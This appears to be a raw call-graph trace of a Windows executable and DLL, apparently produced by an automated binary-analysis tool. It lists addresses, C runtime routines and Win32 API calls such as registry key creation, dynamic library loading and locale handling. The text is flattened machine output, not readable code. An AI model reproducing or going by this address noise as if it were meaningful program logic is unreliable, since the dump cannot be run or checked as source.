__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86864->86870 86868 111464ba 86865->86868 86866->86866 86869 11146439 wvsprintfA 86866->86869 86872 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86867->86872 86868->86855 86875 11146454 86869->86875 86871 111463fe 86870->86871 86871->86855 86873 111463d5 86872->86873 86873->86855 86874 111464a1 OutputDebugStringA 86874->86862 86875->86874 86875->86875 86876->86858 86877 110262c0 LoadLibraryA 86878 11031780 86879 1103178e 86878->86879 86883 11146a90 86879->86883 86882 110317af std::locale::facet::_Facet_Register 86886 11145be0 86883->86886 86887 11145bf0 86886->86887 86887->86887 86892 11110230 86887->86892 86889 11145c02 86899 11145b10 86889->86899 86891 1103179f SetUnhandledExceptionFilter 86891->86882 86910 11163a11 86892->86910 86895 11110247 86927 11029a70 265 API calls 2 library calls 86895->86927 86896 1111025e _memset 86896->86889 86900 11145b27 _strncpy 86899->86900 86901 11145b62 _strupr_s_l_stat 86899->86901 86900->86900 86902 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86900->86902 86936 11143300 MultiByteToWideChar 86901->86936 86904 11145b5e 86902->86904 86904->86891 86905 11145b94 86937 11143340 WideCharToMultiByte GetLastError 86905->86937 86907 11145ba6 86908 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86907->86908 86909 11145bb9 86908->86909 86909->86891 86911 11163a8e 86910->86911 86924 11163a1f 86910->86924 86934 1116e368 DecodePointer 86911->86934 86913 11163a94 86935 1116a1af 66 API calls __getptd_noexit 86913->86935 86914 11163a2a 86914->86924 86928 1116e85d 66 API calls __NMSG_WRITE 86914->86928 86929 1116e6ae 66 API calls 6 library calls 86914->86929 86930 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86914->86930 86917 11163a4d RtlAllocateHeap 86917->86924 86926 1111023e 86917->86926 86919 11163a7a 86932 1116a1af 66 API calls __getptd_noexit 86919->86932 86923 11163a78 86933 1116a1af 66 API calls __getptd_noexit 86923->86933 86924->86914 86924->86917 86924->86919 86924->86923 86931 1116e368 DecodePointer 86924->86931 86926->86895 86926->86896 86928->86914 86929->86914 86931->86924 86932->86923 86933->86926 86934->86913 86935->86926 86936->86905 86937->86907 86938 11041180 86939 110411b2 86938->86939 86940 110411b8 86939->86940 86942 110411d4 86939->86942 86941 110fb470 15 API calls 86940->86941 86944 110411ca CloseHandle 86941->86944 86943 110412e8 86942->86943 86949 1104120d 86942->86949 86970 110881d0 297 API calls 5 library calls 86942->86970 86945 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86943->86945 86944->86942 86947 110412f5 86945->86947 86946 11041268 86960 110fb470 GetTokenInformation 86946->86960 86949->86943 86949->86946 86951 1104127a 86952 11041282 CloseHandle 86951->86952 86955 11041289 86951->86955 86952->86955 86953 110412cb 86956 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86953->86956 86954 110412b1 86957 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86954->86957 86955->86953 86955->86954 86958 110412e4 86956->86958 86959 110412c7 86957->86959 86961 110fb4b8 86960->86961 86962 110fb4a7 86960->86962 86971 110f2300 9 API calls 86961->86971 86964 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86962->86964 86966 110fb4b4 86964->86966 86965 110fb4dc 86965->86962 86967 110fb4e4 86965->86967 86966->86951 86968 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86967->86968 86969 110fb50a 86968->86969 86969->86951 86970->86949 86971->86965 86972 11144dd0 86973 11144de1 86972->86973 86986 111447f0 86973->86986 86977 11144e65 86980 11144e82 86977->86980 86982 11144e64 86977->86982 86978 11144e2b 86979 11144e32 ResetEvent 86978->86979 86994 111449b0 265 API calls 2 library calls 86979->86994 86982->86977 86995 111449b0 265 API calls 2 library calls 86982->86995 86983 11144e46 SetEvent WaitForMultipleObjects 86983->86979 86983->86982 86985 11144e7f 86985->86980 86987 111447fc GetCurrentProcess 86986->86987 86988 1114481f 86986->86988 86987->86988 86989 1114480d GetModuleFileNameA 86987->86989 86991 11144849 WaitForMultipleObjects 86988->86991 86996 111101b0 86988->86996 86989->86988 86991->86977 86991->86978 86994->86983 86995->86985 86997 11163a11 _malloc 66 API calls 86996->86997 86998 111101ce 86997->86998 86999 11110203 _memset 86998->86999 87000 111101d7 wsprintfA 86998->87000 87003 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86999->87003 87019 11029a70 265 API calls 2 library calls 87000->87019 87004 1111021d 87003->87004 87004->86991 87005 11144140 GetModuleFileNameA 87004->87005 87006 11144183 87005->87006 87008 111441c3 87005->87008 87020 11081e00 87006->87020 87010 111441cf LoadLibraryA 87008->87010 87011 111441e9 GetModuleHandleA GetProcAddress 87008->87011 87009 11144191 87009->87008 87014 11144198 LoadLibraryA 87009->87014 87010->87011 87015 111441de LoadLibraryA 87010->87015 87012 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87011->87012 87013 11144209 87011->87013 87016 11144243 10 API calls 87012->87016 87013->87016 87014->87008 87015->87011 87017 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87016->87017 87018 111442c0 87017->87018 87018->86991 87022 11081e13 _strrchr 87020->87022 87021 11081e2a std::locale::facet::_Facet_Register 87021->87009 87022->87021 87024 11081c50 IsDBCSLeadByte 87022->87024 87024->87021 87025 6fa15ae6 87026 6fa15af1 ___security_init_cookie 87025->87026 87027 6fa15af6 87025->87027 87026->87027 87030 6fa159f0 87027->87030 87029 6fa15b04 87031 6fa159fc 87030->87031 87035 6fa15a99 87031->87035 87036 6fa15a49 87031->87036 87038 6fa1588c 87031->87038 87033 6fa15a79 87034 6fa1588c __CRT_INIT@12 113 API calls 87033->87034 87033->87035 87034->87035 87035->87029 87036->87033 87036->87035 87037 6fa1588c __CRT_INIT@12 113 API calls 87036->87037 87037->87033 87039 6fa15898 87038->87039 87040 6fa158a0 87039->87040 87041 6fa1591a 87039->87041 87083 6fa1607f HeapCreate 87040->87083 87042 6fa1597b 87041->87042 87046 6fa15920 87041->87046 87044 6fa15980 87042->87044 87045 6fa159d9 87042->87045 87084 6fa16da9 TlsGetValue 87044->87084 87049 6fa159de __freeptd 87045->87049 87071 6fa158a9 87045->87071 87048 6fa1593e 87046->87048 87046->87071 87099 6fa15e35 10 API calls _doexit 87046->87099 87052 6fa1594d 87048->87052 87100 6fa19b09 HeapFree GetLastError DeleteCriticalSection _free 87048->87100 87049->87071 87102 6fa15965 6 API calls __mtterm 87052->87102 87055 6fa158a5 87059 6fa158c0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 87055->87059 87055->87071 87058 6fa15948 87101 6fa16dfa 6 API calls _free 87058->87101 87093 6fa198c4 9 API calls __calloc_crt 87059->87093 87060 6fa1599d DecodePointer 87066 6fa159b2 87060->87066 87063 6fa158df 87064 6fa158e3 87063->87064 87065 6fa158ea 87063->87065 87094 6fa16dfa 6 API calls _free 87064->87094 87095 6fa1ef5b 91 API calls 2 library calls 87065->87095 87069 6fa159b6 87066->87069 87070 6fa159cd 87066->87070 87103 6fa16e37 12 API calls 2 library calls 87069->87103 87104 6fa11bfd 87070->87104 87071->87036 87072 6fa158ef 87075 6fa15903 87072->87075 87096 6fa1ecd4 81 API calls 5 library calls 87072->87096 87082 6fa15908 87075->87082 87098 6fa19b09 HeapFree GetLastError DeleteCriticalSection _free 87075->87098 87076 6fa159bd GetCurrentThreadId 87076->87071 87079 6fa158f8 87079->87075 87097 6fa15c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 87079->87097 87080 6fa15918 87080->87064 87082->87071 87083->87055 87085 6fa15985 87084->87085 87086 6fa16dbe DecodePointer TlsSetValue 87084->87086 87087 6fa1d3f5 87085->87087 87086->87085 87089 6fa1d3fe 87087->87089 87090 6fa15991 87089->87090 87091 6fa1d41c Sleep 87089->87091 87109 6fa1a082 87089->87109 87090->87060 87090->87071 87092 6fa1d431 87091->87092 87092->87089 87092->87090 87093->87063 87094->87071 87095->87072 87096->87079 87097->87075 87098->87080 87099->87048 87100->87058 87101->87052 87102->87071 87103->87076 87105 6fa11c31 87104->87105 87106 6fa11c08 HeapFree 87104->87106 87105->87071 87106->87105 87107 6fa11c1d 87106->87107 87108 6fa11c23 GetLastError 87107->87108 87108->87105 87111 6fa1a08e 87109->87111 87110 6fa1a0bc RtlAllocateHeap 87110->87111 87112 6fa1a09a 87110->87112 87111->87110 87111->87112 87112->87089 87113 11174898 87136 1116c675 87113->87136 87115 111748b5 _LcidFromHexString 87116 111748c2 GetLocaleInfoA 87115->87116 87117 111748f5 87116->87117 87118 111748e9 87116->87118 87141 1116558e 85 API calls 3 library calls 87117->87141 87121 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87118->87121 87120 11174901 87123 1117490b GetLocaleInfoA 87120->87123 87129 1117493b _LangCountryEnumProc@4 _strlen 87120->87129 87122 11174a65 87121->87122 87123->87118 87125 1117492a 87123->87125 87124 111749ae GetLocaleInfoA 87124->87118 87127 111749d1 87124->87127 87142 1116558e 85 API calls 3 library calls 87125->87142 87144 1116558e 85 API calls 3 library calls 87127->87144 87129->87118 87129->87124 87130 11174935 87130->87129 87143 11164644 85 API calls 3 library calls 87130->87143 87131 111749dc 87131->87118 87134 111749e4 _strlen 87131->87134 87145 1116558e 85 API calls 3 library calls 87131->87145 87134->87118 87146 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 87134->87146 87147 1116c5fc GetLastError 87136->87147 87138 1116c67d 87139 1116c68a 87138->87139 87161 1116e66a 66 API calls 3 library calls 87138->87161 87139->87115 87141->87120 87142->87130 87143->87129 87144->87131 87145->87134 87146->87118 87162 1116c4ba TlsGetValue 87147->87162 87150 1116c669 SetLastError 87150->87138 87153 1116c62f DecodePointer 87154 1116c644 87153->87154 87155 1116c660 87154->87155 87156 1116c648 87154->87156 87172 11163aa5 87155->87172 87171 1116c548 66 API calls 4 library calls 87156->87171 87159 1116c666 87159->87150 87160 1116c650 GetCurrentThreadId 87160->87150 87163 1116c4cf DecodePointer TlsSetValue 87162->87163 87164 1116c4ea 87162->87164 87163->87164 87164->87150 87165 1116ac7e 87164->87165 87168 1116ac87 87165->87168 87167 1116acc4 87167->87150 87167->87153 87168->87167 87169 1116aca5 Sleep 87168->87169 87178 11170fc4 87168->87178 87170 1116acba 87169->87170 87170->87167 87170->87168 87171->87160 87173 11163ab0 HeapFree 87172->87173 87174 11163ad9 __dosmaperr 87172->87174 87173->87174 87175 11163ac5 87173->87175 87174->87159 87189 1116a1af 66 API calls __getptd_noexit 87175->87189 87177 11163acb GetLastError 87177->87174 87179 11170fd0 87178->87179 87183 11170feb 87178->87183 87180 11170fdc 87179->87180 87179->87183 87187 1116a1af 66 API calls __getptd_noexit 87180->87187 87181 11170ffe RtlAllocateHeap 87181->87183 87186 11171025 87181->87186 87183->87181 87183->87186 87188 1116e368 DecodePointer 87183->87188 87184 11170fe1 87184->87168 87186->87168 87187->87184 87188->87183 87189->87177 87190 11030ef3 RegOpenKeyExA 87191 11030f20 87190->87191 87192 1103103d 87190->87192 87274 11143bd0 RegQueryValueExA 87191->87274 87194 11031061 87192->87194 87197 11031145 87192->87197 87200 111101b0 std::locale::facet::_Facet_Register 265 API calls 87194->87200 87196 11031030 RegCloseKey 87196->87192 87199 111101b0 std::locale::facet::_Facet_Register 265 API calls 87197->87199 87202 1103114c 87199->87202 87206 11031088 87200->87206 87426 110fae60 272 API calls std::locale::facet::_Facet_Register 87202->87426 87203 111648ed __input_l 79 API calls 87209 11030f6d 87203->87209 87205 11030f86 87210 11163ca7 std::locale::facet::_Facet_Register 79 API calls 87205->87210 87207 110312db GetStockObject GetObjectA 87206->87207 87211 1103130a SetErrorMode SetErrorMode 87207->87211 87208 111648ed __input_l 79 API calls 87208->87209 87209->87205 87209->87208 87215 11030f92 87210->87215 87213 111101b0 std::locale::facet::_Facet_Register 265 API calls 87211->87213 87214 11031346 87213->87214 87280 11028980 87214->87280 87215->87196 87216 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 87215->87216 87218 11030fe8 87216->87218 87220 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 87218->87220 87219 11031360 87222 111101b0 std::locale::facet::_Facet_Register 265 API calls 87219->87222 87221 11031011 87220->87221 87221->87196 87223 11031386 87222->87223 87224 11028980 268 API calls 87223->87224 87225 1103139f InterlockedExchange 87224->87225 87227 111101b0 std::locale::facet::_Facet_Register 265 API calls 87225->87227 87228 110313c7 87227->87228 87283 1108a880 87228->87283 87230 110313df GetACP 87294 11163f93 87230->87294 87235 11031410 87341 11143780 87235->87341 87237 1103143c 87238 111101b0 std::locale::facet::_Facet_Register 265 API calls 87237->87238 87239 1103145c 87238->87239 87348 11061aa0 87239->87348 87242 110314d4 87367 110ccc90 87242->87367 87244 111101b0 std::locale::facet::_Facet_Register 265 API calls 87246 110314ae 87244->87246 87427 11061710 87246->87427 87247 111101b0 std::locale::facet::_Facet_Register 265 API calls 87249 11031501 87247->87249 87374 11125d40 87249->87374 87275 11030f4a 87274->87275 87275->87196 87276 11163ca7 87275->87276 87277 11163c91 87276->87277 87440 1116450b 87277->87440 87281 11088b30 268 API calls 87280->87281 87282 1102898b _memset 87281->87282 87282->87219 87284 111101b0 std::locale::facet::_Facet_Register 265 API calls 87283->87284 87285 1108a8b7 87284->87285 87286 1108a8d9 InitializeCriticalSection 87285->87286 87287 111101b0 std::locale::facet::_Facet_Register 265 API calls 87285->87287 87290 1108a93a 87286->87290 87289 1108a8d2 87287->87289 87289->87286 87534 1116305a 66 API calls std::exception::_Copy_str 87289->87534 87290->87230 87292 1108a909 87535 111634b1 RaiseException 87292->87535 87295 11163fc6 87294->87295 87296 11163fb1 87294->87296 87295->87296 87298 11163fcd 87295->87298 87536 1116a1af 66 API calls __getptd_noexit 87296->87536 87538 1117027b 102 API calls 12 library calls 87298->87538 87299 11163fb6 87537 1116edc4 11 API calls __mbschr_l 87299->87537 87302 11163ff3 87303 11031406 87302->87303 87539 111700e4 97 API calls 6 library calls 87302->87539 87305 111663a3 87303->87305 87306 111663af __close 87305->87306 87307 111663d0 87306->87307 87308 111663b9 87306->87308 87310 1116c675 __getptd 66 API calls 87307->87310 87565 1116a1af 66 API calls __getptd_noexit 87308->87565 87312 111663d5 87310->87312 87311 111663be 87566 1116edc4 11 API calls __mbschr_l 87311->87566 87314 11171306 ____lc_handle_func 74 API calls 87312->87314 87315 111663df 87314->87315 87316 1116ac7e __calloc_crt 66 API calls 87315->87316 87317 111663f5 87316->87317 87318 111663c9 __close _setlocale 87317->87318 87319 1117459f __lock 66 API calls 87317->87319 87318->87235 87320 1116640b 87319->87320 87540 11165814 87320->87540 87327 111664ec 87571 111710d5 8 API calls 87327->87571 87329 1116643b __setlocale_nolock 87331 1117459f __lock 66 API calls 87329->87331 87330 111664f2 87572 1117116e 66 API calls 4 library calls 87330->87572 87333 11166461 87331->87333 87567 111712b9 74 API calls 3 library calls 87333->87567 87335 11166473 87568 111710d5 8 API calls 87335->87568 87337 11166479 87338 11166497 87337->87338 87569 111712b9 74 API calls 3 library calls 87337->87569 87570 111664e1 LeaveCriticalSection _doexit 87338->87570 87724 11143690 87341->87724 87343 111437c3 87343->87237 87344 11143690 IsDBCSLeadByte 87346 11143795 87344->87346 87345 11166654 85 API calls std::locale::facet::_Facet_Register 87345->87346 87346->87343 87346->87344 87346->87345 87347 111437cc 87346->87347 87347->87237 87349 11061710 293 API calls 87348->87349 87350 11061ade 87349->87350 87351 111101b0 std::locale::facet::_Facet_Register 265 API calls 87350->87351 87352 11061b0b 87351->87352 87353 11061b24 87352->87353 87354 11061710 293 API calls 87352->87354 87355 111101b0 std::locale::facet::_Facet_Register 265 API calls 87353->87355 87354->87353 87356 11061b35 87355->87356 87357 11061710 293 API calls 87356->87357 87359 11061b4e 87356->87359 87357->87359 87358 11031487 87358->87242 87358->87244 87359->87358 87736 11142e60 87359->87736 87361 11061b76 87745 11061a70 87361->87745 87368 110ccc99 87367->87368 87369 110314fa 87367->87369 87894 11145410 GetSystemMetrics GetSystemMetrics 87368->87894 87369->87247 87371 110ccca0 std::locale::facet::_Facet_Register 87371->87369 87372 110cccae CreateWindowExA 87371->87372 87372->87369 87373 110cccd8 SetClassLongA 87372->87373 87373->87369 87375 111101b0 std::locale::facet::_Facet_Register 265 API calls 87374->87375 87376 11125d74 87375->87376 87377 11125da5 87376->87377 87378 11125d8a 87376->87378 87895 11124f70 87377->87895 87941 110765c0 463 API calls std::locale::facet::_Facet_Register 87378->87941 87380 11125d9a 87380->87377 87426->87206 87428 111101b0 std::locale::facet::_Facet_Register 265 API calls 87427->87428 87429 11061761 87428->87429 87430 11061777 InitializeCriticalSection 87429->87430 89053 11061210 266 API calls 3 library calls 87429->89053 87433 11061826 87430->87433 87434 110617b7 87430->87434 87433->87242 89054 1105f830 287 API calls 3 library calls 87434->89054 87436 110617d8 RegCreateKeyExA 87437 11061832 RegCreateKeyExA 87436->87437 87438 110617ff RegCreateKeyExA 87436->87438 87437->87433 87439 11061865 RegCreateKeyExA 87437->87439 87438->87433 87438->87437 87439->87433 87441 11164524 87440->87441 87444 111642e0 87441->87444 87456 11164259 87444->87456 87446 11164304 87464 1116a1af 66 API calls __getptd_noexit 87446->87464 87449 11164309 87465 1116edc4 11 API calls __mbschr_l 87449->87465 87452 1116433a 87454 11164381 87452->87454 87466 11171a63 79 API calls 3 library calls 87452->87466 87453 11030f5e 87453->87203 87454->87453 87467 1116a1af 66 API calls __getptd_noexit 87454->87467 87457 1116426c 87456->87457 87463 111642b9 87456->87463 87458 1116c675 __getptd 66 API calls 87457->87458 87459 11164271 87458->87459 87460 11164299 87459->87460 87468 11171306 87459->87468 87460->87463 87483 111715a2 68 API calls 6 library calls 87460->87483 87463->87446 87463->87452 87464->87449 87465->87453 87466->87452 87467->87453 87469 11171312 __close 87468->87469 87470 1116c675 __getptd 66 API calls 87469->87470 87471 11171317 87470->87471 87472 11171345 87471->87472 87474 11171329 87471->87474 87485 1117459f 87472->87485 87476 1116c675 __getptd 66 API calls 87474->87476 87475 1117134c 87492 111712b9 74 API calls 3 library calls 87475->87492 87478 1117132e 87476->87478 87481 1117133c __close 87478->87481 87484 1116e66a 66 API calls 3 library calls 87478->87484 87479 11171360 87493 11171373 LeaveCriticalSection _doexit 87479->87493 87481->87460 87483->87463 87486 111745c7 EnterCriticalSection 87485->87486 87487 111745b4 87485->87487 87486->87475 87494 111744dd 87487->87494 87489 111745ba 87489->87486 87521 1116e66a 66 API calls 3 library calls 87489->87521 87492->87479 87493->87478 87495 111744e9 __close 87494->87495 87496 11174511 87495->87496 87497 111744f9 87495->87497 87503 1117451f __close 87496->87503 87525 1116ac39 87496->87525 87522 1116e85d 66 API calls __NMSG_WRITE 87497->87522 87499 111744fe 87523 1116e6ae 66 API calls 6 library calls 87499->87523 87503->87489 87504 11174505 87524 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 87504->87524 87505 11174531 87531 1116a1af 66 API calls __getptd_noexit 87505->87531 87506 11174540 87507 1117459f __lock 65 API calls 87506->87507 87510 11174547 87507->87510 87512 1117454f InitializeCriticalSectionAndSpinCount 87510->87512 87513 1117457a 87510->87513 87514 1117455f 87512->87514 87520 1117456b 87512->87520 87515 11163aa5 _free 65 API calls 87513->87515 87516 11163aa5 _free 65 API calls 87514->87516 87515->87520 87517 11174565 87516->87517 87532 1116a1af 66 API calls __getptd_noexit 87517->87532 87533 11174596 LeaveCriticalSection _doexit 87520->87533 87522->87499 87523->87504 87527 1116ac42 87525->87527 87526 11163a11 _malloc 65 API calls 87526->87527 87527->87526 87528 1116ac78 87527->87528 87529 1116ac59 Sleep 87527->87529 87528->87505 87528->87506 87530 1116ac6e 87529->87530 87530->87527 87530->87528 87531->87503 87532->87520 87533->87503 87534->87292 87535->87286 87536->87299 87537->87303 87538->87302 87539->87303 87541 1116581d 87540->87541 87543 11165836 87540->87543 87541->87543 87573 11171046 8 API calls 87541->87573 87544 111664d5 87543->87544 87574 111744c6 LeaveCriticalSection 87544->87574 87546 11166422 87547 11166187 87546->87547 87548 111661b0 87547->87548 87554 111661cb 87547->87554 87549 111661ba 87548->87549 87550 11165e4d __setlocale_set_cat 101 API calls 87548->87550 87553 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87549->87553 87550->87549 87551 1116631c 87575 11165c2c 87551->87575 87556 111663a1 87553->87556 87554->87551 87557 11166200 _strpbrk _strncmp _strcspn _strlen 87554->87557 87559 111662f5 87554->87559 87556->87327 87556->87329 87557->87549 87557->87559 87562 1116630e 87557->87562 87563 11165e4d __setlocale_set_cat 101 API calls 87557->87563 87631 111699f9 66 API calls 2 library calls 87557->87631 87558 11166331 __setlocale_nolock 87558->87549 87558->87559 87589 11165e4d 87558->87589 87559->87549 87635 11165ac7 70 API calls 6 library calls 87559->87635 87632 1116ed72 87562->87632 87563->87557 87565->87311 87566->87318 87567->87335 87568->87337 87569->87338 87570->87318 87571->87330 87572->87318 87573->87543 87574->87546 87576 1116c675 __getptd 66 API calls 87575->87576 87577 11165c67 87576->87577 87581 11165cd4 87577->87581 87585 11165ccd __setlocale_nolock _memmove _strlen 87577->87585 87679 1116cd5f 87577->87679 87578 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87579 11165e4b 87578->87579 87579->87558 87581->87578 87583 1116ed72 __invoke_watson 10 API calls 87583->87585 87585->87581 87585->87583 87586 1116cd5f _strcpy_s 66 API calls 87585->87586 87636 1116593d 87585->87636 87643 11174bcc 87585->87643 87688 11165a5c 66 API calls 3 library calls 87585->87688 87689 111699f9 66 API calls 2 library calls 87585->87689 87586->87585 87590 1116c675 __getptd 66 API calls 87589->87590 87591 11165e7a 87590->87591 87592 11165c2c __expandlocale 96 API calls 87591->87592 87596 11165ea2 __setlocale_nolock _strlen 87592->87596 87593 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87594 11165eb7 87593->87594 87594->87558 87595 11165ea9 87595->87593 87596->87595 87597 1116ac39 __malloc_crt 66 API calls 87596->87597 87598 11165ef3 _memmove 87597->87598 87598->87595 87599 1116cd5f _strcpy_s 66 API calls 87598->87599 87604 11165f66 _memmove 87599->87604 87600 1116ed72 __invoke_watson 10 API calls 87601 11166186 87600->87601 87603 111661b0 87601->87603 87609 111661cb 87601->87609 87602 1116606a _memcmp 87611 111660f0 87602->87611 87612 11166121 87602->87612 87605 11165e4d __setlocale_set_cat 100 API calls 87603->87605 87623 111661ba 87603->87623 87604->87602 87614 11166155 87604->87614 87715 11174ea4 79 API calls 2 library calls 87604->87715 87605->87623 87606 1116631c 87610 11165c2c __expandlocale 96 API calls 87606->87610 87608 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87615 111663a1 87608->87615 87609->87606 87625 111662f5 87609->87625 87627 11166200 _strpbrk _strncmp _strcspn _strlen 87609->87627 87621 11166331 __setlocale_nolock 87610->87621 87617 11163aa5 _free 66 API calls 87611->87617 87613 1116612d InterlockedDecrement 87612->87613 87612->87614 87613->87614 87618 11166145 87613->87618 87614->87600 87615->87558 87617->87595 87619 11163aa5 _free 66 API calls 87618->87619 87620 1116614d 87619->87620 87622 11163aa5 _free 66 API calls 87620->87622 87621->87623 87624 11165e4d __setlocale_set_cat 100 API calls 87621->87624 87621->87625 87622->87614 87623->87608 87624->87621 87625->87623 87717 11165ac7 70 API calls 6 library calls 87625->87717 87627->87623 87627->87625 87628 1116630e 87627->87628 87629 11165e4d __setlocale_set_cat 100 API calls 87627->87629 87716 111699f9 66 API calls 2 library calls 87627->87716 87630 1116ed72 __invoke_watson 10 API calls 87628->87630 87629->87627 87630->87623 87631->87557 87718 1116ec49 87632->87718 87635->87549 87639 11165956 _memset 87636->87639 87637 11165962 87637->87585 87638 11165985 _strcspn 87638->87637 87641 1116ed72 __invoke_watson 10 API calls 87638->87641 87691 111699f9 66 API calls 2 library calls 87638->87691 87639->87637 87639->87638 87690 111699f9 66 API calls 2 library calls 87639->87690 87641->87638 87644 1116c675 __getptd 66 API calls 87643->87644 87646 11174bd9 87644->87646 87650 11174be6 GetUserDefaultLCID 87646->87650 87652 11174c10 87646->87652 87702 1117463f 85 API calls _TranslateName 87646->87702 87648 11174c6d 87678 11174dae 87648->87678 87692 111746a1 87648->87692 87649 11174c22 87654 11174c36 87649->87654 87657 11174c2d 87649->87657 87650->87648 87651 11174c78 87651->87650 87655 11174c83 _strlen 87651->87655 87652->87649 87652->87651 87707 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 87654->87707 87661 11174c89 EnumSystemLocalesA 87655->87661 87656 11174cde 87662 11174d03 IsValidCodePage 87656->87662 87656->87678 87703 11174b29 87657->87703 87660 11174c34 87660->87648 87708 1117463f 85 API calls _TranslateName 87660->87708 87661->87648 87665 11174d15 IsValidLocale 87662->87665 87662->87678 87664 11174c54 87664->87648 87666 11174c6f 87664->87666 87667 11174c66 87664->87667 87671 11174d28 87665->87671 87665->87678 87709 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 87666->87709 87669 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 87667->87669 87669->87648 87670 11174d79 GetLocaleInfoA 87672 11174d8a GetLocaleInfoA 87670->87672 87670->87678 87671->87670 87673 1116cd5f _strcpy_s 66 API calls 87671->87673 87671->87678 87674 11174d9e 87672->87674 87672->87678 87675 11174d66 87673->87675 87710 1116c308 66 API calls _xtoa_s@20 87674->87710 87675->87672 87677 1116ed72 __invoke_watson 10 API calls 87675->87677 87677->87670 87678->87585 87680 1116cd74 87679->87680 87681 1116cd6d 87679->87681 87712 1116a1af 66 API calls __getptd_noexit 87680->87712 87681->87680 87685 1116cd92 87681->87685 87683 1116cd79 87713 1116edc4 11 API calls __mbschr_l 87683->87713 87686 1116cd83 87685->87686 87714 1116a1af 66 API calls __getptd_noexit 87685->87714 87686->87585 87688->87585 87689->87585 87690->87638 87691->87638 87693 111746fb GetLocaleInfoW 87692->87693 87694 111746ab __setlocale_nolock 87692->87694 87695 11174717 87693->87695 87701 111746ea 87693->87701 87694->87693 87697 111746c1 __setlocale_nolock 87694->87697 87696 1117471d GetACP 87695->87696 87695->87701 87696->87656 87698 111746d2 GetLocaleInfoW 87697->87698 87699 111746ef 87697->87699 87698->87701 87711 11163c91 79 API calls __wcstoi64 87699->87711 87701->87656 87702->87652 87704 11174b30 _GetPrimaryLen _strlen 87703->87704 87705 11174b66 EnumSystemLocalesA 87704->87705 87706 11174b80 87705->87706 87706->87660 87707->87660 87708->87664 87709->87648 87710->87678 87711->87701 87712->87683 87713->87686 87714->87683 87715->87602 87716->87627 87717->87623 87719 1116ec68 _memset __call_reportfault 87718->87719 87720 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 87719->87720 87723 1116ed54 __call_reportfault 87720->87723 87721 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 87722 1116ed70 GetCurrentProcess TerminateProcess 87721->87722 87722->87549 87723->87721 87725 111436a6 87724->87725 87726 11143763 87725->87726 87731 11081d30 87725->87731 87726->87346 87728 111436cb 87729 11081d30 IsDBCSLeadByte 87728->87729 87730 111436fb _memmove 87729->87730 87730->87346 87732 11081d3c 87731->87732 87734 11081d41 __mbschr_l std::locale::facet::_Facet_Register 87731->87734 87735 11081c50 IsDBCSLeadByte 87732->87735 87734->87728 87735->87734 87737 11142e6a 87736->87737 87738 11142e6c 87736->87738 87737->87361 87739 11110230 std::locale::facet::_Facet_Register 265 API calls 87738->87739 87740 11142e92 87739->87740 87741 11142e9b _strncpy 87740->87741 87742 11142eb9 87740->87742 87741->87361 87748 11029a70 265 API calls 2 library calls 87742->87748 87749 11061970 87745->87749 87760 11061290 87749->87760 87753 11061a08 87807 11061170 87753->87807 87755 11061a1a 87756 110619cc 87756->87753 87758 11061320 274 API calls 87756->87758 87758->87756 87761 111101b0 std::locale::facet::_Facet_Register 265 API calls 87760->87761 87762 110612ac 87761->87762 87763 110612f5 87762->87763 87764 110612b3 87762->87764 87819 1116305a 66 API calls std::exception::_Copy_str 87763->87819 87812 1105ee10 87764->87812 87767 110612eb 87771 11061320 87767->87771 87768 11061304 87820 111634b1 RaiseException 87768->87820 87770 11061319 87772 11061635 87771->87772 87776 11061355 87771->87776 87772->87756 87773 11061624 87774 1105ee10 68 API calls 87773->87774 87774->87772 87775 110614b4 87775->87773 87804 11061542 std::ios_base::_Tidy 87775->87804 87821 110611e0 87775->87821 87776->87775 87777 11061401 RegEnumValueA 87776->87777 87778 11061389 RegQueryInfoKeyA 87776->87778 87782 1106149c 87777->87782 87793 11061435 87777->87793 87780 110613c2 87778->87780 87781 110613ae 87778->87781 87784 110613e2 87780->87784 87828 11029a70 265 API calls 2 library calls 87780->87828 87827 11029a70 265 API calls 2 library calls 87781->87827 87785 11163aa5 _free 66 API calls 87782->87785 87789 11163a11 _malloc 66 API calls 87784->87789 87788 110614a9 87785->87788 87786 11081d30 IsDBCSLeadByte 87786->87793 87788->87775 87791 110613f0 87789->87791 87790 110615a0 87790->87804 87842 11029a70 265 API calls 2 library calls 87790->87842 87791->87777 87792 1106146e RegEnumValueA 87792->87782 87792->87793 87793->87786 87793->87792 87805 11061649 